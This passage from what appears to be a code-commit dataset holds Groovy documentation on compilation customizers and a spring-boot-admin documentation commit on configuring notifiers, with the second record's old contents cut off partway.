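\n\nPut together with a `GroovyShell`, a minimal sketch of the workaround (the script body is an assumption, consistent with the include above):\n\n[source,groovy]\n--------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\nimport groovy.util.logging.Log\n\ndef config = new CompilerConfiguration()\nconfig.addCompilationCustomizers(new ASTTransformationCustomizer(Log))\n\n\/\/ the script's implicit class now carries @Log, so `log` is available\nnew GroovyShell(config).evaluate(\"log.info 'hello from a customized script'\")\n--------------------------------------------------------------------------\n\n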
Being applied to\nevery class node means the transform will reach the script itself, but also any classes defined within the script.\n\nIf the AST transformation that you are using accepts parameters, you can\nuse parameters in the constructor too:\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_customname,indent=0]\n-----------------------------------------------------------------------------------------------------------------\n\nAs the AST transformation customizer works with objects instead of AST\nnodes, not all values can be converted to AST transformation parameters.\nFor example, primitive types are converted to\u00a0`ConstantExpression` (that\nis, `LOGGER` is converted to\u00a0`new ConstantExpression('LOGGER')`), but if\nyour AST transformation takes a closure as an argument, then you have to\ngive it a\u00a0`ClosureExpression`, like in the following example:\n\n[source,groovy]\n--------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_closure,indent=0]\n--------------------------------------------------------------------------------------------------------------\n\nFor a complete list of options, please refer to gapi::org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\n\n=== Secure AST customizer\n\nThis customizer will allow the developer of a DSL to restrict the\n*grammar* of the language, to prevent users from using some constructs,\nfor example. It is ``secure'' in that sense only, and it is very\nimportant to understand that it does\u00a0*not* replace a security manager.\nThe only reason for it to exist is to limit the expressiveness of the\nlanguage. This customizer only works at the AST (abstract syntax tree)\nlevel, not at runtime! It can seem strange at first glance, but it makes\nmuch more sense if you think of Groovy as a platform to build DSLs. You\nmay not want a user to have a complete language at hand. In the example\nbelow, we will demonstrate it using an example language that only\nallows arithmetic operations, but this customizer allows you to:\n\n* allow\/disallow creation of closures\n* allow\/disallow imports\n* allow\/disallow package definition\n* allow\/disallow definition of methods\n* restrict the receivers of method calls\n* restrict the kind of AST expressions a user can use\n* restrict the tokens (grammar-wise) a user can use\n* restrict the types of the constants that can be used in code\n\nFor all those features, the secure AST customizer works using either a\nwhitelist (list of elements that are allowed)\u00a0*or* a blacklist (list of\nelements that are disallowed). For each type of feature (imports,\ntokens, \u2026) you have the choice to use either a whitelist or a blacklist,\nbut you can mix whitelists and blacklists for distinct features. 
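\n\nA minimal sketch of restricting the grammar this way (the particular toggles below are assumptions; the include that follows shows the full arithmetic-only example):\n\n[source,groovy]\n--------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport org.codehaus.groovy.control.customizers.SecureASTCustomizer\n\ndef config = new CompilerConfiguration()\ndef secure = new SecureASTCustomizer()\nsecure.closuresAllowed = false \/\/ user code may not define closures\nsecure.methodDefinitionAllowed = false \/\/ ...nor methods\nsecure.importsWhitelist = [] \/\/ whitelist style: no imports allowed at all\nconfig.addCompilationCustomizers(secure)\n\nnew GroovyShell(config).evaluate('1 + 2') \/\/ fine; a closure literal would be rejected at compile time\n--------------------------------------\n\n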
In\ngeneral, you will choose whitelists (disallow all, allow selected).\n\n[source,groovy]\n-------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SecureASTCustomizer\nimport static org.codehaus.groovy.syntax.Types.* <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz,indent=0]\n-------------------------------------------------------------------------------------\n<1> use for token types from gapi::org.codehaus.groovy.syntax.Types\n<2> you can use class literals here\n\nIf what the secure AST customizer provides out of the box isn\u2019t enough\nfor your needs, before creating your own compilation customizer, you\nmight be interested in the expression and statement checkers that the\nAST customizer supports. Basically, it allows you to add custom checks\non the AST tree, on expressions (expression checkers) or statements\n(statement checkers). For this, you must\nimplement\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker`\nor\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker`.\n\nThose interfaces define a single method called\u00a0`isAuthorized`, returning\na boolean, and taking a\u00a0`Statement` (or\u00a0`Expression`) as a parameter. It\nallows you to perform complex logic over expressions or statements to\ntell if a user is allowed to do it or not.\n\nFor example, there's no predefined configuration flag in the customizer which\nwill let you prevent people from using an attribute expression. Using a custom\nchecker, it is trivial:\n\n[source,groovy]\n----------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom,indent=0]\n----------------------------------------------------------------------\n\nThen we can make sure that this works by evaluating a simple script:\n\n[source,groovy]\n----\nnew GroovyShell(config).evaluate '''\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom_assert,indent=4]\n'''\n----\n<1> will fail compilation\n\nStatements can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker\nExpressions can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker\n\n=== Source aware customizer\n\nThis customizer may be used as a filter on other customizers. The\nfilter, in that case, is the\u00a0`org.codehaus.groovy.control.SourceUnit`.\nFor this, the source aware customizer takes another customizer as a\ndelegate, and it will apply customization of that delegate if and only\nif predicates on the source unit match.\n\n`SourceUnit` gives you access to multiple things but in particular the\nfile being compiled (if compiling from a file, of course). It gives\nyou the potential to perform operations based on the file name, for\nexample. 
Here is how you would create a source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SourceAwareCustomizer\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz,indent=0]\n--------------------------------------------------------------------\n\nThen you can use predicates on the source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz_predicates,indent=0]\n--------------------------------------------------------------------------\n\n=== Customizer builder\n\nIf you are using compilation customizers in Groovy code (like the\nexamples above) then you can use an alternative syntax to customize compilation.\nA builder\u00a0(`org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder`)\nsimplifies the creation of customizers using a hierarchical DSL.\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport static org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder.withConfig <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=customizer_withconfig,indent=0]\n-----------------------------------------------------------------------------------------------------\n<1> static import of the builder method\n<2> configuration goes here\n\nThe code sample above shows how to use the builder. A static\nmethod,\u00a0_withConfig_, takes a closure corresponding to the builder code,\nand automatically registers compilation customizers to the\nconfiguration. 
Every compilation customizer available in the distribution\ncan be configured this way:\n\n==== Import customizer\n\n[source,groovy]\n----------------------------------------------------------------------------------\nwithConfig(configuration) {\n imports { \/\/ imports customizer\n normal 'my.package.MyClass' \/\/ a normal import\n alias 'AI', 'java.util.concurrent.atomic.AtomicInteger' \/\/ an aliased import\n star 'java.util.concurrent' \/\/ star imports\n staticMember 'java.lang.Math', 'PI' \/\/ static import\n staticMember 'pi', 'java.lang.Math', 'PI' \/\/ aliased static import\n }\n}\n----------------------------------------------------------------------------------\n\n==== AST transformation customizer\n\n[source,groovy]\n-------------------------------------------\nwithConfig(conf) {\n ast(Log) <1>\n}\n\nwithConfig(conf) {\n ast(Log, value: 'LOGGER') <2>\n}\n-------------------------------------------\n<1> apply @Log transparently\n<2> apply @Log with a different name for the logger\n\n==== Secure AST customizer\n\n[source,groovy]\n--------------------------------------\nwithConfig(conf) {\n secureAst {\n closuresAllowed = false\n methodDefinitionAllowed = false\n }\n}\n--------------------------------------\n\n==== Source aware customizer\n\n[source,groovy]\n--------------------------------------------------------------------------------------\nwithConfig(configuration){\n source(extension: 'sgroovy') {\n ast(CompileStatic) <1>\n }\n}\n\nwithConfig(configuration){\n source(extensions: ['sgroovy','sg']) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(extensionValidator: { it.name in ['sgroovy','sg']}) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(basename: 'foo') {\n ast(CompileStatic) <3>\n }\n}\n\nwithConfig(configuration) {\n source(basenames: ['foo', 'bar']) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(basenameValidator: { it in ['foo', 'bar'] }) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(unitValidator: { unit -> !unit.AST.classes.any { it.name == 'Baz' } }) {\n ast(CompileStatic) <5>\n }\n}\n--------------------------------------------------------------------------------------\n<1> apply CompileStatic AST annotation on .sgroovy files\n<2> apply CompileStatic AST annotation on .sgroovy or .sg files\n<3> apply CompileStatic AST annotation on files whose name is 'foo'\n<4> apply CompileStatic AST annotation on files whose name is 'foo' or 'bar'\n<5> apply CompileStatic AST annotation on files that do not contain a class named 'Baz'\n\n==== Inlining a customizer\n\nInlined customizer allows you to write a compilation customizer\ndirectly, without having to create a class for it.\n\n[source,groovy]\n--------------------------------------------------------------\nwithConfig(configuration) {\n inline(phase:'CONVERSION') { source, context, classNode -> <1>\n println \"visiting $classNode\" <2>\n }\n}\n--------------------------------------------------------------\n<1> define an inlined customizer which will execute at the CONVERSION phase\n<2> prints the name of the class node being compiled\n\n==== Multiple customizers\n\nOf course, the builder allows you to define multiple customizers at\nonce:\n\n[source,groovy]\n---------------------------\nwithConfig(configuration) {\n ast(ToString)\n ast(EqualsAndHashCode)\n}\n---------------------------\n\n=== Config script flag\n\nSo far, we have described how you can customize compilation using\na\u00a0`CompilationConfiguration` 
class, but this is only possible if you\nembed Groovy and that you create your own instances\nof\u00a0`CompilerConfiguration` (then use it to create a\n`GroovyShell`,\u00a0`GroovyScriptEngine`, \u2026).\n\nIf you want it to be applied on the classes you compile with the normal\nGroovy compiler (that is to say with \u00a0`groovyc`,\u00a0`ant` or\u00a0`gradle`,\nfor example), it is possible to use a compilation flag named\u00a0`configscript`\nthat takes a Groovy configuration script as argument.\n\nThis script gives you access to the\u00a0`CompilerConfiguration` instance\u00a0*before*\nthe files are compiled (exposed into the configuration script as a variable named `configuration`),\nso that you can tweak it.\n\nIt also transparently integrates the compiler configuration builder above. As an example, let's see\nhow you would activate static compilation by default on all classes.\n\n==== Static compilation by default\n\nNormally, classes in Groovy are compiled with a dynamic runtime. You can activate static compilation\nby placing an annotation named `@CompileStatic` on any class. Some people would like to have this\nmode activated by default, that is to say not having to annotated classes. Using `configscript`,\nthis is possible. First of all, you need to create a file named `config.groovy` into `src\/conf` with\nthe following contents:\n\n[source,groovy]\n--------------------------------------\nwithConfig(configuration) { <1>\n ast(groovy.transform.CompileStatic)\n}\n--------------------------------------\n<1> _configuration_ references a `CompilerConfiguration` instance\n\nThat is actually all you need. You don\u2019t have to import the builder, it\u2019s automatically\nexposed in the script. Then, compile your files using the following command line:\n\n---------------------------------------------------------------------------\ngroovyc -configscript src\/conf\/config.groovy src\/main\/groovy\/MyClass.groovy\n---------------------------------------------------------------------------\n\nWe strongly recommand you to separate configuration files from classes,\nhence why we suggest using the `src\/main` and `src\/conf` directories above.\n\n=== AST transformations (TBD)\n== Custom type checking extensions (TBD)\n== Builders (TBD)\n=== Creating a builder (TBD)\n==== BuilderSupport (TBD)\n==== FactoryBuilderSupport (TBD)\n=== Existing builders (TBD)\n==== MarkupBuilder (TBD)\n==== StreamingMarkupBuilder (TBD)\n==== SaxBuilder (TBD)\n==== StaxBuilder (TBD)\n==== DomBuilder (TBD)\n==== NodeBuilder (TBD)\n==== JsonBuilder (TBD)\n==== StreamingJsonBuilder (TBD)\n==== SwingBuilder (TBD)\n==== AntBuilder (TBD)\n==== CliBuilder (TBD)\n==== ObjectGraphBuilder (TBD)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6d2f1ba80a0e45636a464bcb5bda38aaea6d978","subject":"Polish documentation","message":"Polish documentation\n","repos":"joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/server-notifications.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/server-notifications.adoc","new_contents":"=== Notifications ===\n\n[reminder-notifications]\n==== Reminder notifications ====\nThe `RemindingNotifier` sends reminders for down\/offline applications, it delegates the sending of notifications to another notifier.\n\nBy default a reminder is triggered 
when a registered application changes to `DOWN` or `OFFLINE`. You can alter this behaviour via `setReminderStatuses()`. The reminder ends when either the status changes to a non-triggering status or the application in question gets deregistered.\n\nBy default the reminders are sent every 10 minutes; to change this, use `setReminderPeriod()`. The `RemindingNotifier` itself doesn't start the background thread to send the reminders; you need to take care of this, as shown in the example below:\n\n.How to configure reminders\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n @Autowired\n private Notifier notifier;\n\n @Bean\n @Primary\n public RemindingNotifier remindingNotifier() {\n RemindingNotifier remindingNotifier = new RemindingNotifier(notifier);\n remindingNotifier.setReminderPeriod(TimeUnit.MINUTES.toMillis(5)); \/\/ <1>\n return remindingNotifier;\n }\n\n @Scheduled(fixedRate = 60_000L) \/\/ <2>\n public void remind() {\n remindingNotifier().sendReminders();\n }\n}\n----\n<1> The reminders will be sent every 5 minutes.\n<2> Schedules sending of due reminders every 60 seconds.\n\n[[filtering-notifications]]\n==== Filtering notifications ====\nThe `FilteringNotifier` allows you to filter certain notifications based on rules you can add\/remove at runtime. It delegates the sending of notifications to another notifier.\n\nIf you add a `FilteringNotifier` to your `ApplicationContext`, a RESTful interface on `api\/notifications\/filter` becomes available. When this happens, the UI shows options to manage the filters.\n\nThis notifier is useful if you don't want to receive notifications when deploying your applications. Before stopping the application you can add an (expiring) filter either via a `POST` request or the UI.\n\n.How to configure filtering\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n\t@Autowired\n\tprivate Notifier delegate;\n\n\t@Bean\n\tpublic FilteringNotifier filteringNotifier() { \/\/ <1>\n\t\treturn new FilteringNotifier(delegate);\n\t}\n\n\t@Bean\n\t@Primary\n\tpublic RemindingNotifier remindingNotifier() { \/\/ <2>\n\t\tRemindingNotifier notifier = new RemindingNotifier(filteringNotifier());\n\t\tnotifier.setReminderPeriod(TimeUnit.SECONDS.toMillis(10));\n\t\treturn notifier;\n\t}\n\n\t@Scheduled(fixedRate = 1_000L)\n\tpublic void remind() {\n\t\tremindingNotifier().sendReminders();\n\t}\n}\n----\n<1> Add the `FilteringNotifier` bean using a delegate (e.g. `MailNotifier` when configured)\n<2> Add the `RemindingNotifier` as primary bean using the `FilteringNotifier` as delegate.\n\nTIP: This example combines the reminding and filtering notifiers. 
This allows you to get notifications if a deployed application hasn't restarted within a certain amount of time (until the filter expires).\n\n[[mail-notifications]]\n==== Mail notifications ====\n\nConfigure a `JavaMailSender` using `spring-boot-starter-mail` and set a recipient.\n\n[source,xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-mail<\/artifactId>\n<\/dependency>\n----\n\n.application.properties\n----\nspring.mail.host=smtp.example.com\nspring.boot.admin.notify.mail.to=admin@example.com\n----\n\n.Mail notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.mail.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.mail.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.mail.to\n| Comma-delimited list of mail recipients\n| `\"root@localhost\"`\n\n| spring.boot.admin.notify.mail.cc\n| Comma-delimited list of carbon-copy recipients\n|\n\n| spring.boot.admin.notify.mail.from\n| Mail sender\n|\n\n| spring.boot.admin.notify.mail.subject\n| Mail subject. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id}) is #{to.status}\"+++`\n\n| spring.boot.admin.notify.mail.text\n| Mail body. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id})\\nstatus changed from #{from.status} to #{to.status}\\n\\n#{application.healthUrl}\"+++`\n|===\n\n[[pagerduty-notifications]]\n==== Pagerduty notifications ====\nTo enable Pagerduty notifications you just have to add a generic service to your Pagerduty account and set `spring.boot.admin.notify.pagerduty.service-key` to the service-key you received.\n\n.Pagerduty notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.pagerduty.enabled\n| Enable Pagerduty notifications\n| `true`\n\n| spring.boot.admin.notify.pagerduty.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.pagerduty.service-key\n| Service-key to use for Pagerduty\n|\n\n| spring.boot.admin.notify.pagerduty.url\n| The Pagerduty-rest-api url\n| `+++\"https:\/\/events.pagerduty.com\/generic\/2010-04-15\/create_event.json\"+++`\n\n| spring.boot.admin.notify.pagerduty.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"#{application.name}\/#{application.id} is #{to.status}\"+++`\n\n| spring.boot.admin.notify.pagerduty.client\n| Client-name to use in the event\n|\n\n| spring.boot.admin.notify.pagerduty.client-url\n| Client-url to use in the event\n|\n|===\n\n[hipchat-notifications]\n==== Hipchat notifications ====\nTo enable Hipchat notifications you need to create an API token from your Hipchat account and set the appropriate configuration properties.\n\n.Hipchat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.hipchat.enabled\n| Enable Hipchat notifications\n| `true`\n\n| spring.boot.admin.notify.hipchat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". 
Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.hipchat.url\n| The HipChat REST API (V2) URL\n|\n\n| spring.boot.admin.notify.hipchat.auth-token\n| The API token with access to the notification room\n|\n\n| spring.boot.admin.notify.hipchat.room-id\n| The ID or url-encoded name of the room to send notifications to\n|\n\n| spring.boot.admin.notify.hipchat.notify\n| Whether the message should trigger a user notification\n| `false`\n\n| spring.boot.admin.notify.hipchat.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"<strong>#{application.name}<\/strong>\/#{application.id} is <strong>#{to.status}<\/strong>\"+++`\n|\n|===\n\n[slack-notifications]\n==== Slack notifications ====\nTo enable Slack notifications you need to add an incoming Webhook under custom integrations on your Slack\naccount and configure it appropriately.\n\n.Slack notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.slack.enabled\n| Enable Slack notifications\n| `true`\n\n| spring.boot.admin.notify.slack.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.slack.webhook-url\n| The Slack Webhook URL to send notifications\n|\n\n| spring.boot.admin.notify.slack.channel\n| Optional channel name (without # at the beginning). If different than channel in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.icon\n| Optional icon name (without surrounding colons). If different than icon in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.username\n| Optional username to send notification if different than in Slack Webhooks settings\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.slack.message\n| Message to use in the event. SpEL-expressions and Slack markups are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n\n[letschat-notifications]\n==== Let's Chat notifications ====\nTo enable Let's Chat notifications you need to add the host URL and add the API token and username from Let's Chat.\n\n.Let's Chat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.letschat.enabled\n| Enable Let's Chat notifications\n| `true`\n\n| spring.boot.admin.notify.letschat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.letschat.url\n| The Let's Chat host URL to send notifications\n|\n\n| spring.boot.admin.notify.letschat.room\n| The room to send the messages to\n|\n\n| spring.boot.admin.notify.letschat.token\n| The token to access the Let's Chat API\n|\n\n| spring.boot.admin.notify.letschat.username\n| The username for which the token was created\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.letschat.message\n| Message to use in the event. SpEL-expressions are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n","old_contents":"=== Notifications ===\n\n[reminder-notifications]\n==== Reminder notifications ====\nThe `RemindingNotifier` sends reminders for down\/offline applications, it delegates the sending of notifications to another notifier.\n\nBy default a reminder is triggered when a registered application changes to `DOWN` or `OFFLINE`. 
You can alter this behaviour via `setReminderStatuses()`. The reminder ends when either the status changes to a non-triggering status or the regarding application gets deregistered.\n\nBy default the reminders are sent every 10 minutes, to change this use `setReminderPeriod()`. The `RemindingNotifier` itself doesn't start the background thread to send the reminders, you need to take care of this as shown in the given example below;\n\n.How to configure reminders\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n @Autowired\n private Notifier notifier;\n\n @Bean\n @Primary\n public RemindingNotifier remindingNotifier() {\n RemindingNotifier remindingNotifier = new RemindingNotifier(notifier);\n remindingNotifier.setReminderPeriod(TimeUnit.MINUTES.toMillis(5)); \/\/ <1>\n return remindingNotifier;\n }\n\n @Scheduled(fixedRate = 60_000L) \/\/ <2>\n public void remind() {\n remindingNotifier().sendReminders();\n }\n}\n----\n<1> The reminders will be sent every 5 minutes.\n<2> Schedules sending of due reminders every 60 seconds.\n\n[[filtering-notifications]]\n==== Filtering notifications ====\nThe `FilteringNotifier` allows you to filter certain notification based on rules you can add\/remove at runtime. It delegates the sending of notifications to another notifier.\n\nIf you add a `FilteringNotifier` to your `ApplicationContext` a RESTful interface on `api\/notifications\/filter` gets available. When this happens the ui shows options to manage the filters.\n\nThis notifier is useful if you don't want recieve notifications when deploying your applications. Before stopping the application you can add an (expiring) filter either via a `POST` request or the ui.\n\n.How to configure filtering\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n\t@Autowired\n\tprivate Notifier delegate;\n\n\t@Bean\n\tpublic FilteringNotifier filteringNotifier() { \/\/ <1>\n\t\treturn new FilteringNotifier(delegate);\n\t}\n\n\t@Bean\n\t@Primary\n\tpublic RemindingNotifier remindingNotifier() { \/\/ <2>\n\t\tRemindingNotifier notifier = new RemindingNotifier(filteringNotifier());\n\t\tnotifier.setReminderPeriod(TimeUnit.SECONDS.toMillis(10));\n\t\treturn notifier;\n\t}\n\n\t@Scheduled(fixedRate = 1_000L)\n\tpublic void remind() {\n\t\tremindingNotifier().sendReminders();\n\t}\n}\n----\n<1> Add the `FilteringNotifier` bean using a delegate (e.g. `MailNotifier` when configured)\n<2> Add the `RemindingNotifier` as primary bean using the `FilteringNotifier` as delegate.\n\nTIP: This examples combines the reminding and filtering notifiers. This allows you to get notifications after the deployed applications hasn't restarted in a certain amount of time (until the filter expires).\n\n[[mail-notifications]]\n==== Mail notifications ====\n\nConfigure a `JavaMailSender` using `spring-boot-starter-mail` and set a recipient.\n\n[source,xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-mail<\/artifactId>\n<\/dependency>\n----\n\n.application.properties\n----\nspring.mail.host=smtp.example.com\nspring.boot.admin.notify.mail.to=admin@example.com\n----\n\n.Mail notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.mail.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.mail.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". 
Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.mail.to\n| Comma-delimited list of mail recipients\n| `\"root@localhost\"`\n\n| spring.boot.admin.notify.mail.cc\n| Comma-delimited list of carbon-copy recipients\n|\n\n| spring.boot.admin.notify.mail.from\n| Mail sender\n|\n\n| spring.boot.admin.notify.mail.subject\n| Mail subject. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id}) is #{to.status}\"+++`\n\n| spring.boot.admin.notify.mail.text\n| Mail body. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id})\\nstatus changed from #{from.status} to #{to.status}\\n\\n#{application.healthUrl}\"+++`\n|===\n\n[[pagerduty-notifications]]\n==== Pagerduty notifications ====\nTo enable pagerduty notifications you just have to add a generic service to your pagerduty-account and set `spring.boot.admin.notify.pagerduty.service-key` to the service-key you received.\n\n.Pagerduty notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.pagerduty.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.pagerduty.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.pagerduty.service-key\n| Service-key to use for Pagerduty\n|\n\n| spring.boot.admin.notify.pagerduty.url\n| The Pagerduty-rest-api url\n| `+++\"https:\/\/events.pagerduty.com\/generic\/2010-04-15\/create_event.json\"+++`\n\n| spring.boot.admin.notify.pagerduty.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"#{application.name}\/#{application.id} is #{to.status}\"+++`\n\n| spring.boot.admin.notify.pagerduty.client\n| Client-name to use in the event\n|\n\n| spring.boot.admin.notify.pagerduty.client-url\n| Client-url to use in the event\n|\n|===\n\n[hipchat-notifications]\n==== Hipchat notifications ====\nTo enable Hipchat notifications you need to create an API token from you Hipchat account and set the appropriate configuration properties.\n\n.Hipchat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.hipchat.enabled\n| Enable Hipchat notifications\n| `true`\n\n| spring.boot.admin.notify.hipchat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.hipchat.url\n| The HipChat REST API (V2) URL\n|\n\n| spring.boot.admin.notify.hipchat.auth-token\n| The API token with access to the notification room\n|\n\n| spring.boot.admin.notify.hipchat.room-id\n| The ID or url-encoded name of the room to send notifications to\n|\n\n| spring.boot.admin.notify.hipchat.notify\n| Whether the message should trigger a user notification\n| `false`\n\n| spring.boot.admin.notify.hipchat.description\n| Description to use in the event. 
SpEL-expressions are supported\n| `+++\"<strong>#{application.name}<\/strong>\/#{application.id} is <strong>#{to.status}<\/strong>\"+++`\n|\n|===\n\n[slack-notifications]\n==== Slack notifications ====\nTo enable Slack notifications you need to add a incoming Webhook under custom integrations on your Slack\naccount and configure it appropriately.\n\n.Slack notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.slack.enabled\n| Enable Slack notifications\n| `true`\n\n| spring.boot.admin.notify.slack.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.slack.webhook-url\n| The Slack Webhook URL to send notifications\n|\n\n| spring.boot.admin.notify.slack.channel\n| Optional channel name (without # at the beginning). If different than channel in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.icon\n| Optional icon name (without surrounding colons). If different than icon in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.username\n| Optional username to send notification if different than in Slack Webhooks settings\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.slack.message\n| Message to use in the event. SpEL-expressions and Slack markups are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n\n[letschat-notifications]\n==== Let\u00b4s Chat notifications ====\nTo enable Let\u00b4s Chat notifications you need to add the host url and add the API token and username from Let\u00b4s Chat\n\n.Let\u00b4s Chat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.letschat.enabled\n| Enable let\u00b4s Chat notifications\n| `true`\n\n| spring.boot.admin.notify.letschat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.letschat.url\n| The let\u00b4s Chat Host URL to send notifications\n|\n\n| spring.boot.admin.notify.letschat.room\n| the room where to send the messages\n|\n\n| spring.boot.admin.notify.letschat.token\n| the token to access the let\u00b4s Chat API\n|\n\n| spring.boot.admin.notify.letschat.username\n| The username for which the token was created\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.letschat.message\n| Message to use in the event. 
